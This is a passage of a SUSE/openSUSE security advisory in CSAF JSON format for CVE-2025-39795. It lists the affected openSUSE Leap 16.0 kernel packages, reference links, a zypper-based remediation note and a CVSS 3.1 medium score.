"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39795",
"url": "https://www.suse.com/security/cve/CVE-2025-39795"
},
{
"category": "external",
"summary": "SUSE Bug 1249609 for CVE-2025-39795",
"url": "https://bugzilla.suse.com/1249609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
